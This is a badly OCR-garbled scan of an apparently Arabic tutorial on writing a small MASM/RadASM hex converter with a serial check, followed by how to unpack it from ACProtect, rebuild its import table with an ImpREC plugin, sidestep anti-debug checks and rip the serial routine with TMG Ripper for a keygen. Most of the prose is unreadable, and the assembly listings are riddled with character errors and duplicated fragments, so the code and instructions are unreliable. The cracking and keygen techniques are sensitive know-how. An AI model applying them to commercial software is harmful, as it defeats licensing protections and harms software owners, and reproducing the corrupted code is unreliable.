6 ay Aya (a sb» di Aya qUcnÓ) o gb, 3 > Eve Se. 


A INS 


DaemonApp.tpl 


a tpl 


A ain.tpl 


ql 


do 3) SÓZRÓ ga eo jade 


2000 


loba leg or VES UAG: ATARE mid lodo e 


er text to convert here: 


Us ed? ' yas 9: 


.  BTN_CONV EC IDD_DIALOG1 
gó0s alos. y BTN_ABOUT ¿3 Editbox=¿3: EDT_TEXT_IN 
BTN_REG pen EDT_TEXT_OUT 


Arte plas daga Je PE yq l ó 


SS 
AS 


.oy 


205 ay blincid ayer 


include windows.inc 
include kernel32.inc 
include user32.inc 

include Comct132.inc 
include shel1l32.inc 


includelib kernel32.lib 
includelib user32.lib 

includelib Comct132.lib 
includelib shell32.lib 


13). const 
IDD_DIALOG1 


A]. data?] 
hInstance 


all ly ud ao lll 2009 


las leg as dy Ives oasz: ATARE welelVrs e 


- Window Option Macro Help 
> Sniplets Fl 


Export ID Equ's Ctrl+F11 Dialog code writer 
Export: 


Notepad ena 


Calculator Template: 


Notepad (.rap) 


Masm32 Menu: 
Goto Dos 


Proc name: 
Toolbar creator wWindProc 7 y 


DK Cancel 


Dialog to window 


Colref 


A ab» , (a EEN R 
JO A el e nt ro 


;ResiMy prog v 1.0Ver.rc 
RINF1 


all ly 0 zado lll 2009 


nodo, me La a A TO E IO 
ol sh 10 30 ds 0, sio els ¿yo Mp lla 


csi sio de Lio 


l-JDlgProc proc hWin: HWND, uMsg: UIN l-JDigProc proc hWin: EWND, uMsg: 


mov eax, uUMsg 
.1f eax-=WM_INITDIALOG 


mov eax, uMsg 
.1f eax==WM_INITDIALOG 


.elseif eax—=WM_COMMAND 
mov eax, wParam 
and eax, -1 
.1f eax-=BTN_CONV 


.elseif eax—WM_COMMAND 


.elseif eax==WM_CLOSE 


.elseif eax-=BTN_ABOUT .else 
.elseif eax--BIN_REG mov eax, FALSE 
.endif ret 
.elseif eax-WM_CLOSE .endif 
mov eax, TRUE 
.Clse ret 


mov eax, FALSE 
ret 
.endif 


DlgProc endp 


eax, TRUE 


DlgProc endp 


.elseif eax==WM_CLOSE 
££ Cia Jaco | WM_CLOSE la 45d: 
5 «Clase 


.« Dialog end » 


abia 0 U cada do lll 2009 


Ling lo ag me luego: ATARE grid TAS 


¿ados bis blu hoy 


¿ES As ARO «masm.ct» il pias bo 
an 


%RADASM% Addins ¿oiga bd 


5 


de 


¿ed al ¿boy pd e po ? Le QUe DigProc Aaa sedoÍ a del 3 EN 3 y ¿pub 


A) 


EUA 


¡—-JDlgProc proc hWin: EWND, uMsg:UINT, wParam: WPARAM, 1Param: LPARAM 


mov eax, uMsg 
.1f eax==WM_INITDIALOG 


.elseif eax==WM_COMMAND 
mov eax, wParam 
and eax, -1 
.1f eax==BTN_1 

—> - 

.€lseif eax-=BTN_2 


.elseif eax-=BTN_3 


.endif 
.elseif eax=-=M_CLOSE 
invoke EndDialog, hWin, 0 
.else 
mov eax, FALSE 
ret 
.endif 
mov eax, TRUE 
ret 


DlgProc endp 


all ly 0 ao lll 2009 


lada lag aria IES Ago: ATARE Ed LAA 


el 


Ela a e al 


27 el ly e as) al 


íDialog end)? 
invoke EndDialog, hWin, 0 


mm 


Dialog Procedure 


mov eax,uMsg 
.1f eax—WM_INITDIALOG 


NT O NT A 


£ 
10 00 


.elseif eax—WM_COMMAND 
mov eax, wParam 

and eax, -1 

.1f eax—BIN_1 


.elseif eax—BTIN_2 


BD» GQ) NM pd 


€ 


-) 


.elseif eax—BIN_3 


.endif 
.elseif eax—WM_CLOSE 


O (nn (ny (n£ (a (a (qa (nn (na (q (n 


O 10 (0 


(a 


invoke EndDialog, 
«else 


O 


Gu NN pp 


10] 


mov eax, FALSE 


ret 


nn 0 


.endif 


mov eax, TRUE 


-) NN UU 4» 


8 


ret 


Ns 0 
tO 00 


DigProc endp 


q 


RADASM ¿y 4ÚÓ áppie unas : 


hWin, 0 


DigProc proc hWin:HWND,uMsg:UINT, ,wParam:WPARAM,lParam: LPARAM 


dE al des ibilina a za ¿en allalaos as, do blaz, MASM só q, do 


JExtraMLibs Ch 53 ( 


include user32.inc 
include Comct132.inc 
include shel1l32.inc 


includelib kernel32.lib 
includelib user32.lib 

includelib Comct132.lib 
includelib shell32.lib 


include macros.asm 


uselib masm32,cryptohash 


include masm32.inc 
includelib masm32.lib 
include cryptohash.inc 
includelib cryptohash.lib 


a ay ul ao lll 


E gd mid lala t 


..s pe . 5 e ns 4 A 
¿ya iblcajuserlib 00 ji sona yg bl macros.asm. 


3, Lo Eo Compiling De da Seu Al yor paro : 


sime 172 ms 
ABinYML.EXE /c /coff /Cp /nologo /I” Include" "My prog v 1.0.asm” 

7 prog v 1.0.asm 

inc(15) : fatal error A1009 

acro Called From 


de ad duda ól macros.asm samaS jo ¿bso yuserlib ¿boáocha: (3er ab 


Puegyó > 


uselib MACRO args: VARARG 
LOCAL acnt,buffer,var,1b1,1libb,incc,buf1,buf2 
acnt = argcount (args) 
incc equ <include |> 
libb equ <includelib > 
var 
s1b1 
buffer equ getarg(var,args) 


E E TE ta 
ad a a das ll ta a: 


.1f eax==BTN_CONV 
invoke GetDlgltemText, hWin, EDT_ 
.elseif eax-=BTN_ABOUT 
.elseif eax==BIN_REG LJ EDT_TEXT_IN 
.endif 8) EDT_TEXT_OUT 
.elseif eax==WM_CLOSE 
invoke EndDialog, hWin, 0 


.else 
mov eax, FALSE 
ret 

.endif 

mov eax, TRUE 

ret 


all ly 0 ao lll 2009 


loba leg or VES UAG: ATARE grid LAA 


Eros ty óallias 2 ica E Controls ¿das pls, ly jo Fra ye CTRL+SPACE +0 


30jye YY rabia d EDT_ sRADASM 3*2L 70, ¿ll ¿by ha 3 gallo esa as, 


Le ep 


.1f eax-=BIN_CO 
invoke GetDlglIte: y EDT_TEXT_IN, addr bu: 
push eax 
invoke HexDecode, addr buf in, addr buf tmp 
pop esi 
shr esi, 1 


invoke AsciiDump, addr buf tmp, addr buf out, esi 
invoke SetDlgltemText,hWin, EDT_TEXT_ OUT, addr buf_ou 


A a E 


dy ' 


Parameters 
1. Ipsrc The address of the byte data t y y =1] 
2. Ipbuf The address of the buffer to S ” 
3. Insrc The length of the byte data to be converted e Buffer 


Pauls ja ey ¿0 
tepic ¡Cáxlas Buffer ás -2 


There is no return value 


2 Lu PAS Y 


cg igluó: 


all ly 0d zado lll 2009 


liga leg as ami VES UAgZ: ATARE gd ud lvelasz 


l-JDlgProc proc hWin: EHWND, uMsg:UINT,wParam: WPARAM, 1Param: LPARAM 


LOCAL hFile: DWORD 
LOCAL fSize: DWORD 

LOCAL buf in[MAX PATH] :BYTE 
LOCAL buf out[(MAX PATH] :BYTE 
LOCAL buf tmp[MAX PATH] :BYTE 


mov eax, uMsg 
.1f eax==WM_INITDIALOG 


.elseif eax-=WM_COMMAND 
mov eax, wParam 
and eax, -1 
.1f eax-=BTN_CONV 
invoke GetDlgltemText, hWin, EDT_TEXT_IN, addr buf in, sizeof buf in 
push eax 
invoke HexDecode, addr buf in, addr buf tmp 


shr esi, 1 
invoke AsciiDump, addr buf tmp, addr buf out, esi 
invoke SetDlgltemText,hWin, EDI_TEXT_OUT, addr buf out 
.elseif eax-=BTN_ABOUT 
.elseif eax-BTN_REG 
.endif 
.elseif eax-WM_CLOSE 
invoke EndDialog, hWin, ( 


.else 
mov eax, FALSE 
ret 
.endif 
mov eax, TRUE 
ret 
DlgProc endp 


Project >Version contorl> Backup projecttab + 205%2:/, 


Project Version Control - Addin For RadASM - Coded By WillASM 
AM] 
Version Control Settings | Milestones | Backup Project 


Backup Comment 1 Exclude File Types 


Backup Default Comment 
Project $N, $2, Backup Created On $D 4t $7. 


Backup Location 


Compression Level 


i 2 
WProjectsWWCBackups! 


Best Compression y 3 Backup Now! 


A TIN 


E gd ud leds z 


A L.4 


Je 2 Y pu E a l ble $ J 3 «QUe bea 


.idb yexe, obj, res, ¡lkápa0 :yadsldiz? vaz q obs Jo extensions 155 


1:32 Y aalV 3h, 


vadip a els (eos) de e 


nter text to convert here: 


al les q Za: 


3933 dio ima: (UY gg ¿e y 0 Al is ay ¿udóS, 


pgs cs 209 al, OEI 30 gag 066 qa ¿rg QUO de 


A AA Sd, os 3. . . ett ds TE e 
¿Jar maylist correct Tools PAuto jugo za 5 yá dd ja ri do ONES 
Automatic Correct X 
Keyword: 4 Replace string: 7 
dba buffer db MáX_PATH dup (0) 2 
mark NOP-ENOP-ENOp»ENOprbRENOprb nop nop. | | 
dda war dd O 
dwa war du O =l 
ha Ein | 
sad SADD['"'] 
a addr 3 
o offset 
Ah LOCAL hi basbdAZ DA TUÍOYTO sd 
4| "” » 


A TIN 


2 


liga legs o LES LAGT: ATARE grid ladelartge 000 


4 el 


yl ¿yadl já tie rob 3062 JN ra 


¿yal aya alo yg slo 4 


7 


o jea ee vr YE SPACE cacipós ¿los ¿aa 


; od a jue addr ¿GU 


TIVOS AAN 124 MN 
ayona Sino "2040: 


A A AS E 


nov esx, Msg 
| .1f eax-=WM_INITDIALOG 
invoke CheckRadioButton, hWin, RBN_ASM, RBN_C, RBN_ASM 
.elseif eax==/M_COMMAND 
BOY e4x, wParen 


and esx, - 
= .11 esx-=27N_CONV 
invoke GerDigltenTex:, Min, E£DT_TEXT_1N, addr buf_ín, sizeof buf_ín 
push esx 
invoke IsDlgButtonChecked, hWin, RBN_ASM 
l-.if eax 
invoke NexDecode, adár buf_ín, adár buf_tap 
pop esi 
shr esi, 


invoke ¡iDump, adár buf_tamp, adár buf_out, esi 


.else 
invoke lstrcpy, addr buf out, SADD("char array[] = ([") ; copy array start 
pop esi 
xXOr €ecx, ecx 
mov edi, 16 

[| «while ecx < esi 

mov ax, word ptr buf in[ecx] 

mov word ptr buf out[edi], 'x0' ; concatenate hex prefix for c/c++ 

mov word ptr buf out[edi+2], ax ; concatenate the enetered byte 

mov word ptr buf out[edi+4], ' ,' ; concatenate separator 

add ecx, 2 
add edi, 6 
.endw 
mov word ptr buf out[edi-2], ';)" ; concatenate array end operator 
mov word ptr buf out[edi], 0A0Dh ; (return) 
mov byte ptr buf out[edi+2], 0 ; (null terminator) 


.endif 
invoke SerDigltenTex:, Min, EDT_TEXT_OOUT, adár buf_out 


2stools View>Lancome 
(da Apecido): 


aby 0 U calado lll 2009 


E gd id Ive 


= 
nl Lancome tools option 


Levelizer Normalizer 


Tab ¡is (spc) +] Alignfix 9 -] | Length 


Align pos + Labelshift 3 = Put N tabs 


[7] Use align pos [7] UseFixPos Norm. after 0 


Right align label [P] Preview 


[F] Do not move omment lines [ Preview 


E 


Er) CTRA ( e ada obo ja 


po cad: 


mov eax, uMsg 
.1f eax-=WM_INITDIALOG 
invoke CheckRadioButton, hWin, RBN_ASM, RBN_C, RBN_ASM 
.elseif eax-=WM_COMMAND 
mov eax, wParam 
and eax, -1 
.1f eax-=BTN_CONV 
invoke GetDlgltemText, hWin, EDI_TEXT_IN, addr buf in, sizeof buf in 


push eax 

invoke IsDlgButtonChecked, hWin, RBN_ASM 

«¡if eax 
invoke HexDecode, addr buf in, addr buf tmp 
pop esi 


shr esi, 1 
invoke AsciiDump, addr buf tmp, addr buf out, esi 


.19€ 

invoke lstrcpy, addr buf out, SADD("char array[] = ([") ? copy array 

pop esi 

XOr €ecx, ecx 

mov edi, 16 

«While ecx < esi 
mov ax, word ptr buf in[ecx] 
mov word ptr buf out[edi], 'x0' ; concatenate hex prefix for c/c 
mov word ptr buf out[edi+2], ax ; concatenate the enetered byte 


mov word ptr buf out[edi+4], ' ,' ; Cconcatenate separator 
add ecx, 2 
add edi, 6 
.endw 
mov word ptr buf out[edi-2], ';)" ; concatenate array end operato 


mov word ptr buf out[edi], 0A0Dh ; (return) 
mov byte ptr buf out[edi+2], 0 ; (null terminator) 


all ly 0 zado lll 2009 


liga leg as ami VES UAgZ: ATARE gd mud lala z 


My prog v1.0 : Hex to bin converter 


— Enter text to convert here: Options: 


6400£8870100004,320324000E 84D 01000064, 
C Asm 


¡E 


char array[] = (0x64, 0x00, OxE8, 0x87, 0x01, 0x00, 0x00, 0x43, 0x20, 032, 0x40, 0x00, OxE8, 
0x4D, 0%01, 0x00, 0x00, Ox): 


Convert | Register | 


FL ja ce vÓ ce ey) 7d A 9 o du 


bno prlde rya ¿qa 


JRADASM 


:Dialogprocedure“WCTRL+J ha z¿co ye e 


invoke SetDlgltemText,hWin, EDT_T 
.elseif eax==BTN_ABOUT 
.elseif eax-=BTN_REG 
.endif 
.elseif eax-=WM_CLOSE 
invoke EndDialog, hWin, 0 
.l9e 


-—-. PR A 


assume 

.e assume nothing 
mo comment function 
dialog close 


Dialog end 

Dialog Procedure 
forever loop Ñ 
frame default : 


l-JSerialProc [proc hWin: EWND, uMsg: UINT,wParam: WPARAM, lParam: LPARAM 


av mMaor 


abia 0 U cada do lll 2009 613 == 


liga leg 0 odie llego: ATARE grille Ii 


«strvouiz ¿gozos 33*dialog 5 


> 159 boga ¿e controls ia Cejas ps dá ya dopo: 


(57 Dialog 


Create dubidtaprdinuaSerialProc ¿pú declaration+ proto ¿blas ¿oso ale pill 
proto Es goabiyálko DA 


Create proto 


Add export 


Remove all exports 


Edit comment 


:DigProczoliga O 


.elseif eax-=BTN_REG 


invoke DialogBoxParam, hinstance, DLG_SERIAL, NULL, addr SerialProc, NULL 
.endif 


MOV eax, uMsg 
.1f  — eax-=WM_INITDIALOG 
invoke  CheckRadioButton, hWin, RBN_ASM, RBN_C, RBN_ASM 
invoke GetPrivateProfileString,SADD("RegInfo"), 
ADD ("NAME"), 
O, addr buf in, A 
MAX PATH, 4 
SADD("reg.ini") 
mov dummy, eax 
invoke GetPrivateProfileString,SADD("RegInfo"), ' 
SADD ("SERIAL"), 0, 4 
addr buf out, 4 
MAX PATH, Y 
SADD ("reg.ini") 
invoke IsSerialCorrectProc, addr buf in, [dummy], addr buf out 
«if leax || dummy <= 6 
mov dummy, FALSE 
.else 


mov dummy, TRUE 


aby 0 U calado ll pal 2009 


lui leg as aioz VES UASZ: ATARE gd ud lvalasz 


3 
«2n911 
.Clseif eax==NM COMMAND 
mov  eax, wParam 
and  eax, -1 - 
.1£  eax==BTN_CONV 
invoke  GetDlgltemText, hWin, EDI_TEXT_IN, addr buf_in, sizeo 
push eax 
:SerialProc by O 
21390 


IsSerialCorrectProc 24) O 


q : e .,% Qe NO 
y ci a a 


aio 0 U cada do lll 2009 6513 IF 


liga lee ag re les ago: ATARE Ed MO al 


¡-JIsSerialCorrectProc proc regname: DWORD, cname: DWORD, regserial: DWORD 


LOCAL buf 1[MAX PATH]: BYTE 


mov edi, [regname] 
mov  esi, [regserial] 


xor ecx, ecx 


.while [cname] 
MOVZX eax, byte ptr [edi+ecx] 
shr al, 1 
and  eax, 0fíh 


5 á eax < 13 
mov al, byte ptr array3[eax] 
mov byte ptr buf 1[ecx], al 
«Clseif eax < 20 s£ eax >= 13 
mov al, byte ptr  array2[eax] 
mov byte ptr buf 1l[ecx], al 
.€lseif eax < 31 ss eax >= 20 
mov al, byte ptr array4[eax] 
mov byte ptr buf 1l[ecx], al 
.elseif eax < 74 ¿5 eax >= 31 
mov al, byte ptr  arrayl[eax] 
mov byte ptr buf 1l[ecx], al 


shr A dl 
and  eax, 0ffh 
jmp (tb 

inc ecx 


dec [cname] 


mov byte ptr buf 1[ecx], 0 
invoke lstrcmp, addr buf 1, esi 


LE leax 

mov  €ax, TRUE 
.else 

mov eax, FALSE 
.endif 
ret 


IsSerialCorrectProc endp 


307 tas ez a: 


de coro a rondó ql regini oe hy rogó )C windows sp zeAs: 


1- ed EN yla Daya Ej ¿ónyo 1 1%] dd 9, 
2- ade oLión So, jala ¿ORO 0 


abi ly Uca ll pal 2009 


ll logs a loe SAG z: ATARE $ y ud lc dut 


Qe olicaioqyadlial 3180 poza al ya 30 


¿ y day 


yes yaoi dara sl cdsveza fishing serials. Keygen 
Y Ave stay ero dió o qe y ga alles lia 34 ja guar pura ad ió Eno 


alar ed gal ezo gio ¿e ya aa 04. 


$ Ia Hua JOE putas e O) son JS cual ia 0.98 ACProtect 
uy aja 3 
Aa a ExtralProtection|Protector.| q» st 2* Jin: ive jo plo, 


ua, CL 29 


aligtól dis Esa 


y asoó sy du astas Guay da O lilas 339 0 ¿2 a Bufers ¿So a ¿a DATA 


¿ed OllyDbg 32 +04 fe (an du 3183 ¿ ¿pc ques. 10 399% ge gs js): 


ai ls Uca lps 2009 (515 PH 


loba leg or VES UAG: ATARE gr oleo e 


Ignore (pass to program] following exceptions: 
INT3 breaks 
Single-step break 
Memory access violation 
Integer division by O 
Invalid or privileged instruction 
Al FPU exceptions 


Án Ignore also following custom exceptions or ranges: 


[90000000  PERREFEF a 


Project >Project s2ueDebug 0 Elo y shoes ÚRADASMA duo ae compiling 


: Options 
IES JR r A 
O Release o Debug, Project | Make Tools Wing 
Compile Re 4,O,$BMRC.EXE nen r” Add New 


1 Add Existing 
Assemble 3,0, $BMML.EXE /c /coft /Cp /Zi fnolos. Accelerator 
Resource 


pl Stringtable 
1 


Link 5,O,$BWLINK.EXE ISUBSYSTEMWINDÓ, 


. 
> 
+ 
+ 
- 
- 
» 


Versioninfo 


Language 


Remove From Project 


Set Assembler 


Project Groups 


Ll Project Options 
A TIE 


esporas ud algo iy eos 


24 OlyDhg (33 ¿ga ¿ts Log aó qu) 304 od gis ] 
CTRL+D-_) 
l ze. OllyDbg ja2 Y é CTRL+D< CE lJJY 34 OllyDbg £*4 ¿7 ¿Úlios ¿ias 


E A 
a 


st 
All jága ió ados : 


ES de a 202 symbols ra mu 35h y es dsg agil po et 


. CC 

.vE9 54000000 

$/E9 21000000 

.vE9 52020000 

.vE9 80030000 
ce 


all ly 0d zado lll 2009 


Ling log me luego: ATARE Ed ATA 


aja 40 0 


A 


AS ys Al Poo rd View>Source files +  OllyDbg <= En jádos, 


dl 


a É EN] 


w) 


E qa y yá ELA (a Lie ón ey Sl 2) : 


Module | 
My prog_|MY PROG V 1.0.ASM | WIN My prog v 1.0MMy prog v 1-0.asm| | 
| 


E qe 0d obs SS 
zr =e uuu Y QUIIY, 1HUE J 
43. -endif E 
> ¿2 _|.elseif eax—WHM_COMMAND ” 
> 45. mov eax, wParam - 
> 46. and eax, -1 Des 
> 47. EE eax—BIN_CONV ££ dummy _f 
> 48. invoke GetDlgltemText, H 
> 49. push eax 
> 50. invoke IsDlgButtonCheckef 
> 51 EE eax 
> 52 invoke HexDecodÉ, 
> 53 pop esi Pp 
> 54 shr 1 So E 
> 55 invoke AsciiDuf 
56 4 
> 57. else f 
rl at o por pp dra" 
29734 ¡jay WM_COMMAND un Jana 9 30 aonír e lá A sd 
y AS ¿oagós, ¿Lo) 
:F2-0UmÓ légbyadós +, ¿BTN_CONV 
> o mov esx, Wraram 
and eax, -1 
eg eax=BTIN_CONV_ ¿2 durmy 
invoke GetDlgltemText, hWin, EDI_TEXI 
push eax 
invoke IsDlgButtonChecked, hWin, RBN_ 
SY Cd 3 ya das yaós igyaró: 
— Enter text to convert here: Or 
1111111111144 111111114444411111141111411111111111 
1111111111111 111111141414111111111 a 
1111111111141 111111111114111111111 c 
1111111111111 1111111111111111 
141111111111111111111111111141111114414141111111111 
OO 
ai ly 0 U cda do lll 2009 


loba log or VES UAG: ATARE Ed LAA 


AS CONVERT ¿early jalo y: 
0040112F || ... or] INZIMPOBEOS. 00401218 


00401135 - B3|CMP DWORD PTR DS: [dummy],0 
oos0113c || ... or] SE My prog 00401218 
Ñ sa ner 104 
00401147 - BOLEA EAX,DHORD PTR SS: [EBP-104] 
0040114D - SOI|PUSH EAX 
0040114E - 68 PUSH 3E9 
00401153 - FF|PUSH DWORD PTR SS: [EBP+8] 
00401156 || - ze EXI My prog. cerDigitemtextació 
0040115B - SO|PUSH EAX 
0040115C - GBIDUSH 3F0 
00401161 - FF|PUSH DWORD PTR SS: [EBP+8] 
00401164 || . ze EXE My prog. IsDigButtoncheckedes 
00401169 - OBIOR EAX, EAX 
. A és, E A ñ O | 
seller dió: Mitra sal 


¿20 Ste geo 


Disassembly Source 

MOV EAX, DWORD PTR SS: [EBP+10] mov esx, wParam 

AND EAX, FEFFFEFFEFF and esx, -1 

CMP EAX, 3EB EE eax=BTN_CONV  ¿£ dummy 

CMP DWORD PTR DS: [dummy],0 

PUSH 104 invoke GetDlgltemText, hWin, EDT _TEXT_IN, a: 


LEA EAX, DWORD PTR SS: [EBP-104] 


push ezsx 

PUSH 3F0 invoke IsDlgButtonChecked, hWin, RBN_ASM 
E esx 

LEA EAX, DWORD PTR SS: [EBP-30C] invoke HexDecode, addr buf in, addr buf tmp 

PUSH EAX 

LEA EAX, DWORD PTR SS: [EBP-104] 

POP ESI pop esi 

SHR ESI,1 shr esi, 1 

PUSH ESI invoke AsciiDump, addr buf tmp, addr buf ou: 


verle y 


all ly ud zado lll 2009 


loba leg or VES UAG: ATARE grid LAA 


A ho e 
00 Eye 395 pea Eo Symbols mas : 


¡Cua CTRLEO VÍ vé sisgo y ds Release yaris Ó) 


3| Scan 4 | [Eráa ] Delete | 


A 


a As aa ¿e Ob ¿lib álayye jes y jalea yo Za peleo Es 
Ue 


adridalyos 


3 4 


Galí as; 1) 20992: 


z => B E | e 
Group 1 | Grétp 2 A. Gróup 4 


] 
al bargo: JE Ta 


E 
PUSH 0 


MOV DWORD PTR DS: [hInstance], EAX 


PUSH 0 


PUSH My prog_-_DlgProcf16 
PUSH 0 e, 


PUSH 65 
PUSH DWORD PTR DS: [hInstance] y 


PUSH 0 


CALL My _prog_. ExitBrocesst4 — 


PUSH EBP 


uu 


a : 


1 - Ugo E, ge € , 


e dal u masm32ib ¿GuÓ ¿uo ¿bg ua cryptohash.lib Me és 10, Góxcass, 


A0ueóY ¿estandard COFF idos redalo audi qlónlU yt 


¿o da 33 Produce obj c/c++ files ¿gc abi gro Ryo obj=  compiling 
$7 E que Aa, 


yb añ más e as a ti AE a las ia E 9-3 
E: E 0 


5 


qua EJ gos Ed alli EUA: nl añ yan alla ¿ó ¿yt ET sab PU aja E 
dilo djs $ geo PA 


Ja pija 2 dis jolla jos dep a ja E 


e cia e 
E pe] AQ ed a SO ¿y Lio As 


il: 


all ly 0 O zado lll 2009 


las leg as yz Ives gasz: ATARE 7 ya id PR TIA 


MOV EAX,DWORD PTR SS: [EBP+C] 
CMP EAX, 110 


mov eax, uMsg 
e eax—WM_INITDIALOG 


.elseif eax==WM_COMMAND 
ió ojo Li cl SA jall 


MOV EAX, DWORD PTR SS: [EBP+10] mov esx, wParam 

AND EAX, FEFEFEFF and eax, -1 

CMP EAX, 3EB A TS 
CMP DWORD PTR DS: E a rd 
PUSH 104 invoke GetDlgltemText, hWin, ED 


ñ dG id E ACProtect ya ly SAUS, uN 440 ya yd Ps d A Q A), Qs y Bas, a 0% 0) jah ) 4 


¿devo vol ja radar ed 
20 Eva plugin +Imprec ¿Es? BUG lAT (6, $4 350 24 ¿eo ts oa ir 
lAT 23248, oí 


Liz ¿yá 
ais paginas ua is dues OlyDhg suas la) 
das di ds ¿CreateToolhelp32Snapshot > IsDebuggerPresent 


ñ AR IAT e ds tas Jo gor ¿ajo ia ja ze API zo E ZÓVA: 


all ly 00 ¿Ja Iboga 2009 


Ling log me luego: ATARE grill TAS 


p0000000 

0800405000 OFFSET My _prog_-<ModuleEnty 
O My_prog_-0040500D 
My_prog_-0040501A 
My _prog_-00405027 
My _prog_-00405034 
My _prog_-00405041 


Point> 


My_prog_-0040504E 
My _prog_-0040505B 
My _prog_-004050€8 
My prog_-00405075 
My _prog_-00405082 
My_prog_-0040508F 
My _prog_-0040509C 
My _ prog_-004050A9 


0040 


00402040 


813424 FDSOAFDB|XOR DWO: 
c3 


00405005 
pDo40500C 


SS: [ESP], DBAFSOFD 


da/tayeal]y y, 


, y 1 
sl Saja ¿a 


Bobo decos. 


JA 2/35 ya dida ya sImprec ¿pas ) 20 


práyiga dá ip labo, + Imprec ¿hoz Pluginiit sí q y giga. 


)AlmprecPluginYTemplate ImprecAddin.tpl( 2643 ¿ 303 Template coa eeh 


223) %RADASM%AmasmNtemplates 5 M5 sec y 
CustomControl.tpl >) Console App JE 
9 DII “A DE 
E %) Dex $ 


¿opta sua (a di 32 Tracevagéiz Eu cuy dajónsy rg dll ja y A Sy 3900) 


+ Laa 
Template ¿¿SyJó ¿ca y or js bate hc ¿das 0) : 


abi 9 U cada do lll 2009 (521 == 


E TS gd ud leds z 


|-JTrace proc hFileMap: DWORD, dwSizeMap: DWORD, dwTime0ut: DWORD, dwToTrace: DWORD, 


LOCAL ptrMap: DWORD 


invoke MapView0fFile, hFileMap, FILE MAP READ or FILE MAP WRITE, 0, 0, 0 
.1f enx 
mov ptrMap, eax 
.1f dwSizeMap >= 4 
invoke IsBadReadPtr, [dwToTrace], 4 
IE VeAx 
; Enter a NS conditions here 


«e al, 

mov esi, dword ptr [edi+5] 

and esi, OFFFFFFh 

«if (byte ptr [edi] == 68h ss esi == 243481h) 
mov eax, dword ptr [edi+1] 


xor eax, dword ptr [edi+8] 
mov ebx, ptrMap 
mov [ebx], eax 


push IMP BAD POINTER 
.endif 
.else 
push IMP_INVALID MAP SIZE 
.endif 
.else 
mov eax, IMP CANT MAP VIEW 
ret 
.endif 


invoke UnmapView0fFile, ptrMap 
invoke CloseHandle, hFileMap 


pop eax 
ret 


mov edi, [dwToTrace] les 


E ? FT hunk: 00002008 AS 6 (decimal: 6] valid: NO 


2489BA6C 
DWORD PTR SS: [ESP], 53C654DB 


aby 0 U cada do lla! 2009 (522 == 


loba leg or VES UAG: ATARE grid LAA 


mov esi, dword ptr (ehi+5] 
and esi, OFFFFFFh 


Disassembly 
00405000 | 68 6CBAB924 PUSH 2489BA6C 
004050 [513324]0854C653|x0R DWORD PTR SS: [ESP], 53C654DB 
C3 


004054 RET 


E da .if (byte ptr [edi] = 68h £s esi == 243481h) lus 
[2 ÑS dae 


go ¿y tiojaall y 9Push 453 1 [esp] Xor* 


mov eax, dword ptr [edi+1] 

xor eax, dword ptr [edi+8£] 

mov ebx, ptrMap yá $ 
mov [ebx], eax 

push IMP_SUCCESS 


00405000 | 68 6CBA8924 24898460 
00405005 | 813424 DB54C653 | XOR DWORD PTR SS: 
oos0500c | c3 RET 


daa mov eax, dword ptr [edi+1] 

0 xor eax, dword ptr [edi+8£] 

alaja mov ebx, ptrMap les 
a mov [ebx], eax 


¿door jr pel y oMap 


all ly 0 zado Ult 2009 (523) — 


loba leg ori VES UAG: ATARE id old e 


Ap 2ozGplugin 1 ¿sala Ja Imprec ] 


dll ord:O name  GetDigltemT 
dll ord:018B name:lsDlgButtonChecke 


tb po 3 OllyDbg deá 30 ¿o API3p ds MessageBoxA sióo 39411 jas as o 
ae godallaálo, 


: unpacking-E ¿all Hints-¿ os 
1» ¿yes? Globallloc ¿6d ¿bo iria ¿as FO( SUR ¿Cua 


Der ere 


00408D4C 
00408D52 
00408D53 


00408054 


00408D55 ESI, EDX 

00408D54 00408D57 ESI, OFAO 
00408D55 00408D5D EDI, ESI 

00408D56 00408D5F ECX, 1770 
00408D57 a 

00408D58 00408D65 AL, BL 


00408D59 
00408D5A 
00408D5B 
00408D5C 
00408D5D 
00408D5F 


00408D67 
00408D68 


B| MOV EDI, ESI 
9 MOV ECX, 177€ 


EAX, EDX 


00408D92 


all ly 0 ao lll 2009 


loba leg or VES UAG: ATARE grid LAA 


¡Óz 7 q du RUN Cs Reb lAT Cs Dump da Section .text 2» F2 .3 


Co ESO 23 ado boya ya LS CE ; ón ¿os iytó ÓN ¿a Coderipper 49 1DA de A Qs E 


á0s ¿edo Ed JO) 


20 ol siria TMG Ripper Studiogieó ¿La ssl 
:)KeyGenninglTMG Ripper(¿asjs de? acude as dl y 


G Ripper io £ ls Xx J| 
File view 
Inputfile: 
r Trace startpoint ERES 
Fileoffset: 
| Process datarefs 
Virtual address: Save to .asm 
| Eb] 
Identifier: Save project | ¡A 
About | 
- Endpoints — | 
Add 
Delete | 
] 
- Data-references 
C llano 
C Pro w 
yl 
5/1 Messages 
c 'welcome to TMG Ripper Studio v0.03 
Cc € 
(Word Due to a request, this version is released. It mainly contains disassembly bugfixes, but 
CDw a is also about 10 kb smaller due to optimization of the startup-code. 
F Array: 1 od 
E 2 7 54 LA * y * s 1 1 , e Je s * A * 
¿05 (¿Uva diga: il jyatya sae ego ¿gai gal y aga js jaa 
iv, so UA 5 


asta o Pain y pra 1900 Lai pon abop td ceciógas.).ExtralKeygenninglTMGNTarget 


yz taa: 


00401369 :cá gasoóubs yaózó- 1 


abi 0 U calado lll 2009 (525 NH == 


lada lg aria IES Aga: ATARE Ed leed T 


2 - Alca 3 00401420 ¿có ya, 
gí. OllyDbg ¿legó pao abozs Pe: 


File view 


Inputfile: 


[D:RADASMM 5 


Process datarefs 


¡ S Save to .asm 
00401369 2 Mia | 
Save project | 


 Endpoints 


pao ¿spot 24 p Selva 5 


— Data-references 


00403000 Ignore 
Process as: 
C Code 

(* Data: 


FT Array: h 


duo: Process datarefs | Start trace | 7 


A ES 
3 la) O 4 


all ly 0 zado lll 2009 


lada lg ario IES Aga: ATARE grille leed T 


y Messages 


Displaying found data-references. 
Done! 
Inserting imported functionnames. 

Preparing disassembly. E 
Done. E 


lab aya jreferences data og rra 


yl con Save to .asm EVO dulJio! 1y dd 


ogg yy opa dr AP li Ya: 


120 
121 00008h 

122 [LOC _004014EE £: 0040147D, 004014CA 
123 JMP 

124 LOC 004014 ¿Ref: 00 , 0146E 
125 JMP 1strcpyA 

126 LOC _00401500 Ref: 004014FA 

127 JMP hb tn 


él ) E y NN La o o 3 32 ca : 


12 
13 (OPTION PROLOGUE : NONE 
14 OPTION EPILOGUE: NONE 


15 
16  GenerateProc: 
17 PUSH EBP 
30 ys 
131 LEAVE 
132 RETN o00008h 
133 
